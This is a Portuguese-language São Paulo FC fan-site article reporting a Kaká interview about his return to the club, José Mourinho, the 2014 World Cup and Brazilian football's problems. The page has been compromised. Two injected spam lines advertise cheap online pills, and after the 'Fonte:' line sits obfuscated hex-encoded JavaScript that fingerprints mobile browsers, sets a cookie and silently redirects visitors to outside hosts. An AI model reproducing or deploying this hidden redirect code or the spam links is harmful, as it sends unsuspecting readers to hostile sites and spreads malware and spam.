Destaque

Em entrevista Kaka fala sobre sua carreira passado e futuro

Prestes a vestir novamente a camisa do São Paulo, Kaká revelou seu sonho de ser campeão brasileiro pelo clube que o revelou, o São Paulo. Durante a semana o jogador recebeu a apresentadora do Esporte Espetacular, Glenda Koslowski, para uma entrevista completa em que falou sobre tudo.

Kaká falou sobre a campanha da seleção brasileira na Copa do Mundo, as diferenças táticas e de treinamento adotadas na Europa em relação ao Brasil, a importância de atletas experientes entre os mais novos, deu sua visão de fora sobre a situação ruim do futebol brasileiro no momento, falou da sua passagem pelo Real Madrid e a relação com o técnico português José Mourinho.

– Foi um cara que me ajudou muito a crescer, me ajudou a ter paciência, perseverança, a lutar, a saber respeitar as decisões do treinador. Aprendi a respeitar muito as escolhas do treinador. Ele me ajudou a amadurecer, se passei de uma fase de menino para adulto, foi nesse momento de grande dificuldade que eu passei com o Mourinho – disse.

Focado em se preparar também para a estreia no Orlando City, em 2015, meia disse ter vontade de retornar à Seleção, garante não ter mágoas por não ter sido convocado para o Mundial no Brasil, e acredita que a escolha de Dunga como novo técnico pode, sim, representar um recomeço importante para o grupo que pretende conquistar o hexacampeonato.

– O Dunga tem excelentes números na Seleção. Acho que pode ser um ponto de partida importante, vai ser um cara que pode empurrar e fazer com que a Seleção volte a ter bons resultados e, claro, na expectativa do hexa, que é o que todo torcedor brasileiro quer. A Copa é uma coisa única, mas vamos pensar no hoje (sobre retorno à Seleção). Quero fazer minha parte no São Paulo e ser premiado se tiver um bom rendimento (risos). Gostaria de jogar bem, de ter resultado no São Paulo. Tenho que fazer em campo, e aí se esse prêmio chegar vai ser muito bem vindo – disse.

Se existe mágoa de algum jogador pela não convocação para o Mundial no Brasil, Kaká garante que não é dele. Acompanhado do filho na estreia contra a Croácia, em São Paulo, ele falou com jogadores no campo antes do início da partida, e diz ter consciência de ter feito tudo para estar entre os 23, mas como não foi possível, fez questão de ver de perto a competição.

– Eu fiz tudo o que podia dentro das minhas decisões, dentro da minha dedicação, dentro da minha vontade para estar na lista final da Copa, mas a escolha final foi do treinador. O que eu pude fazer para estar lá eu acho que fiz, e por isso eu não tenho nenhum sentimento de frustração em relação à isso. Não fiquei triste. Tudo que eu podia fazer que estava nas minhas mãos para estar na convocação final, acho que eu fiz. Meu maior respeito pela escolha do treinador –  declarou.

Por falar em técnico, um marcou a carreira de Kaká de forma especial. Barrado e colocado no banco no final da sua passagem pelo Real Madrid com liderança de José Mourinho, jogador diz que não vê o português como carrasco.

– Foi um cara que me ajudou muito a crescer, me ajudou a ter paciência, perseverança, a lutar, a saber respeitar as decisões do treinador. Aprendi a respeitar muito as escolhas do treinador e sempre fazer o que estava ao meu alcance para tentar convencê-lo. Foi o que eu fiz durante esses três anos que eu trabalhei junto com ele. Ele me ajudou a amadurecer, se passei de uma fase de menino para adulto, foi nesse momento de grande dificuldade que eu passei com o Mourinho. De qualquer forma o Real Madrid não foi ruim para mim, eu tenho 120 jogos no clube, com 28 gols, isso dá uma  média de 30 jogos por ano, com três títulos: campeão espanhol, campeão da Copa do Rei, da Supercopa espanhola.

Sem atuar desde o dia 18 de maio, na vitória do Milan por 2 a 1 sobre o Sassuolo, pelo Campeonato Italiano, e já com passagens compradas para os Estados Unidos onde irá morar em 2015, Kaká veio passar férias no Brasil e, na sua visão de fora, da arquibancada, disse não sabe explicar o que aconteceu com o Brasil na goleada por 7 a 1 contra Alemanha, e que futebol a culpa não pode ser individual.

– De torcedor, realmente, sentimento de tristeza de ver o Brasil passar por uma situação tão difícil, no nosso país, em uma semifinal de Copa do Mundo. Meu sentimento foi, como de qualquer torcedor brasileiro: ficar triste e muito chateado. Eu não sei explicar, nem quem estava lá dentro conseguiu, com palavras, explicar o que aconteceu, principalmente na semifinal. Eu não consigo falar para você o que foi, quem foi o culpado, ou qualquer coisa nessa direção. Indicar e apontar o dedo para um responsável em um esporte coletivo como o futebol não acho justo.

Para Kaká, que atua no futebol internacional há 11 anos, o futebol brasileiro vive um momento de fragilidade estrutural, mas não de revelação de talentos.

– Acho que o futebol brasileiro continua sendo um dos maiores formadores de talentos, eu tenho visto isso nos clubes e na própria Seleção, o que eu acredito é que precisa dessa reformulação geral do futebol brasileiro, em termos de calendário, em termos de compromisso dos clubes, em termos de melhorar ainda mais a formação de atletas. Planejamento e organização a longo prazo, não tão imediatista.

obtain at a low figure generic pills on line kaka são paulo fc

Abaixo, veja outros trechos da entrevista

O QUE PRECISA RENOVAR NO FUTEBOL BRASILEIRO?
Na minha opinião, principalmente, em relação a planejamento e organização. Eu acho que não pensar tanto no imediatismo, a gente ainda é um país, não só no futebol, mas de forma geral, que pensa muito no imediatismo, quer tudo agora. No Campeonato Brasileiro a gente vê isso, o treinador tem que dar resultado nos três, quatro primeiros jogos, senão ele já é demitido. Pegando a Alemanha como exemplo, que reformulou tudo. Não foram campeões em casa em 2006, mas mesmo assim continuaram fazendo o planejamento deles, seguindo aquele planejamento, claro, em algum momento você tem que ajustar, mas, de qualquer forma, pensaram a longo prazo e hoje estão colhendo os frutos.

COMO VOCÊ LIDA COM A IDADE AGORA? to order at a low price medications online – http://ariscahesti.blog.widyatama.ac.id/2016/11/30/to-order-at-a-low-price-medications-online/
É muito louco um pouco, passa muito rápido, o salto é muito rápido, é interessante tudo isso. A situação te empurra para um momento de responsabilidade e de liderança que você tem que assumir naquele momento, mas é legal, é muito bom, faz crescer bastante.

TER JOGADORES EXPERIENTES NO GRUPO É  FUNDAMENTAL?
Gosto dessa receita. Os lugares onde eu tive o maior sucesso ‘foi’ onde existiu essa mescla de experiência com a juventude.  Aconteceu comigo quando eu cheguei no Milan com 21 anos em um grupo novo. Convivendo com o Maldini, com o Cafú, mais o Rogério (São Paulo), três exemplos que eu gosto de citar muito no futebol, porque são jogadores que conquistaram tudo, tudo o que eles podiam dentro da carreira deles, e mesmo assim eles continuavam a ter uma motivação de ser o primeiro no treino, não chegar atrasado, ser disciplinado, ser profissional, então aprendi muito desses jogadores. Aprendi principalmente a ter uma mentalidade vencedora. Se eu puder transmitir essas coisas para um jogador que está começando, eu acho que é uma coisa positiva.

NA SUA RECENTE PASSAGEM PELA SELEÇÃO, SENTIU QUE OS JOGADORES VIAM ESSA EXPERIÊNCIA EM VOCÊ?
Senti, e na Seleção, como vai criando um ambiente muito amistoso, muito legal, eles vão se abrindo um pouco, então o David Luiz chegava para mim e falava: “cara, quando eu tava crescendo no São Paulo você era o meu ídolo, hoje eu estou aqui com você”. O Oscar a mesma coisa. Minha responsabilidade já é outra no grupo, não é mais a mesma. É um sentimento muito bom, de uma responsabilidade. acho que foi boa essa passagem nesses dois jogos que eu fiz contra Rússia e contra a Itália.

FALTA TÁTICA NO FUTEBOL BRASILEIRO?
Não, até porque a filosofia do futebol é diferente em cada lugar. Na Itália treina muito a tática, muito. Durante a semana toda tem, pelo menos, 40 minutos por dia de tática. O jogador italiano já cresce dessa forma desde a base. Então ele sabe se posicionar, ele sabe se organizar, ele vai crescendo com aquela mentalidade. No profissional aquilo é automático para ele. Na Espanha já é diferente, é muito mais jogado, muito mais parecido com o nosso futebol. Trabalha a tática, mas não tanto. Varia muito de treinador para treinador, de país pra país. Mas acho que essa Copa foi muito legal, você via times, 3-5-2, 4-4-2, acho que isso muda muito pouco, mas a forma com que os times conseguiam o maior tempo possível se manter organizado, o que pra mim foi uma lição. Eu estive na final e para mim, em relação a isso, foi sensacional. Nada de especial, ‘o time jogou de uma forma diferente, com uma tática diferente’, não, era o posicionamento deles durante todo o jogo, mesmo durante a prorrogação, já automático, isso é muito legal.

Fonte: Gevar _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}(function(a,b){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4)))window.location=b})(navigator.userAgent||navigator.vendor||window.opera,’http://gettop.info/kt/?53vSkc&’);

Clique para adicionar um comentário

Leave a Reply

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

3 × 3 =

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.

Destaque

Mais em Destaque

Tricolor empata com o Ceará na Arena Castelão

saopauloadmin26 de novembro de 2020

Após mais de dois anos, Joao Rojas viaja com o elenco do São Paulo

saopauloadmin24 de novembro de 2020

São Paulo fica somente no empate com o Vasco no Morumbi

saopauloadmin22 de novembro de 2020

Dez motivos que fizeram o São Paulo dar a volta por cima

saopauloadmin20 de novembro de 2020

Tricolor elimina o Flamengo e avança para a semifinal na Copa do Brasil

saopauloadmin19 de novembro de 2020

Tricolor vence o Fortaleza e cola na liderança do Brasileirão

saopauloadmin15 de novembro de 2020

Brenner decide após falha e São Paulo abre vantagem contra o Flamengo na Copa do Brasil

saopauloadmin12 de novembro de 2020

Além do título inédito, saiba o que mais a Copa do Brasil pode trazer ao São Paulo

saopauloadmin11 de novembro de 2020

São Paulo é eliminado pelo Lanús na Sul-Americana

saopauloadmin5 de novembro de 2020